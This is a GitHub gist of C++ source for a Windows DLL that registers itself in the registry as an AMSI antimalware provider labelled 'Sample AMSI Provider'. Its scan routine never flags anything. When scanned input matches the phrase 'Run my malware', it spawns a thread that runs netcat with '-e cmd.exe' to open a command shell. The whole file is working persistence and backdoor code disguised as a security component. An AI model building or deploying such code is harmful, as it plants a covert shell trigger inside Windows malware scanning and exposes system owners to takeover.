-
-
Save analyticsearch/a325154311863d0003df3348cbfa647b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
#include <process.h> | |
using namespace Microsoft::WRL; | |
HMODULE g_currentModule; | |
BOOL APIENTRY DllMain(HMODULE module, DWORD reason, LPVOID reserved) | |
{ | |
switch (reason) | |
{ | |
case DLL_PROCESS_ATTACH: | |
g_currentModule = module; | |
DisableThreadLibraryCalls(module); | |
Module<InProc>::GetModule().Create(); | |
break; | |
case DLL_PROCESS_DETACH: | |
Module<InProc>::GetModule().Terminate(); | |
break; | |
} | |
return TRUE; | |
} | |
#pragma region COM server boilerplate | |
HRESULT WINAPI DllCanUnloadNow() | |
{ | |
return Module<InProc>::GetModule().Terminate() ? S_OK : S_FALSE; | |
} | |
STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID FAR* ppv) | |
{ | |
return Module<InProc>::GetModule().GetClassObject(rclsid, riid, ppv); | |
} | |
#pragma endregion | |
class | |
DECLSPEC_UUID("2E5D8A62-77F9-4F7B-A90C-2744820139B2") | |
SampleAmsiProvider : public RuntimeClass<RuntimeClassFlags<ClassicCom>, IAntimalwareProvider, FtmBase> | |
{ | |
public: | |
IFACEMETHOD(Scan)(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result) override; | |
IFACEMETHOD_(void, CloseSession)(_In_ ULONGLONG session) override; | |
IFACEMETHOD(DisplayName)(_Outptr_ LPWSTR* displayName) override; | |
private: | |
LONG m_requestNumber = 0; | |
}; | |
HRESULT SampleAmsiProvider::Scan(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result) | |
{ | |
_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString"); | |
_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString"); | |
UNICODE_STRING myTriggerString1; | |
RtlInitUnicodeString(&myTriggerString1, L"Run my malware"); | |
UNICODE_STRING myTriggerString2; | |
RtlInitUnicodeString(&myTriggerString2, L"\"Run my malware\""); | |
UNICODE_STRING myTriggerString3; | |
RtlInitUnicodeString(&myTriggerString3, L"'Run my malware'"); | |
ULONG actualSize; | |
ULONGLONG contentSize; | |
if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_SIZE, sizeof(ULONGLONG), reinterpret_cast<PBYTE>(&contentSize), &actualSize)) && | |
actualSize == sizeof(ULONGLONG)) | |
{ | |
*result = AMSI_RESULT_NOT_DETECTED; | |
return S_OK; | |
} | |
PBYTE contentAddress; | |
if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_ADDRESS, sizeof(PBYTE), reinterpret_cast<PBYTE>(&contentAddress), &actualSize)) && | |
actualSize == sizeof(PBYTE)) | |
{ | |
*result = AMSI_RESULT_NOT_DETECTED; | |
return S_OK; | |
} | |
if (contentAddress) | |
{ | |
if (contentSize < 50) | |
{ | |
UNICODE_STRING myuni; | |
myuni.Buffer = (PWSTR)contentAddress; | |
myuni.Length = (USHORT)contentSize; | |
myuni.MaximumLength = (USHORT)contentSize; | |
if (RtlEqualUnicodeString(&myTriggerString1, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString2, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString3, &myuni, TRUE)) | |
{ | |
DWORD thId; | |
CreateThread(NULL, 0, MyThreadFunction, NULL, 0, &thId); | |
} | |
} | |
} | |
*result = AMSI_RESULT_NOT_DETECTED; | |
return S_OK; | |
} | |
void SampleAmsiProvider::CloseSession(_In_ ULONGLONG session) | |
{ | |
} | |
HRESULT SampleAmsiProvider::DisplayName(_Outptr_ LPWSTR *displayName) | |
{ | |
*displayName = const_cast<LPWSTR>(L"Sample AMSI Provider"); | |
return S_OK; | |
} | |
CoCreatableClass(SampleAmsiProvider); | |
DWORD WINAPI MyThreadFunction(LPVOID lpParam) | |
{ | |
system("c:\\Temp\\nc64.exe 127.0.0.1 4444 -e cmd.exe"); | |
return 0; | |
} | |
#pragma region Install / uninstall | |
HRESULT SetKeyStringValue(_In_ HKEY key, _In_opt_ PCWSTR subkey, _In_opt_ PCWSTR valueName, _In_ PCWSTR stringValue) | |
{ | |
LONG status = RegSetKeyValue(key, subkey, valueName, REG_SZ, stringValue, (wcslen(stringValue) + 1) * sizeof(wchar_t)); | |
return HRESULT_FROM_WIN32(status); | |
} | |
STDAPI DllRegisterServer() | |
{ | |
wchar_t modulePath[MAX_PATH]; | |
if (GetModuleFileName(g_currentModule, modulePath, ARRAYSIZE(modulePath)) >= ARRAYSIZE(modulePath)) | |
{ | |
return E_UNEXPECTED; | |
} | |
wchar_t clsidString[40]; | |
if (StringFromGUID2(__uuidof(SampleAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0) | |
{ | |
return E_UNEXPECTED; | |
} | |
wchar_t keyPath[200]; | |
HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString); | |
if (FAILED(hr)) return hr; | |
hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"SampleAmsiProvider"); | |
if (FAILED(hr)) return hr; | |
hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls\\InProcServer32", clsidString); | |
if (FAILED(hr)) return hr; | |
hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, modulePath); | |
if (FAILED(hr)) return hr; | |
hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, L"ThreadingModel", L"Both"); | |
if (FAILED(hr)) return hr; | |
// Register this CLSID as an anti-malware provider. | |
hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString); | |
if (FAILED(hr)) return hr; | |
hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"SampleAmsiProvider"); | |
if (FAILED(hr)) return hr; | |
return S_OK; | |
} | |
STDAPI DllUnregisterServer() | |
{ | |
wchar_t clsidString[40]; | |
if (StringFromGUID2(__uuidof(SampleAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0) | |
{ | |
return E_UNEXPECTED; | |
} | |
// Unregister this CLSID as an anti-malware provider. | |
wchar_t keyPath[200]; | |
HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString); | |
if (FAILED(hr)) return hr; | |
LONG status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath); | |
if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status); | |
// Unregister this CLSID as a COM server. | |
hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString); | |
if (FAILED(hr)) return hr; | |
status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath); | |
if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status); | |
return S_OK; | |
} | |
#pragma endregion |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment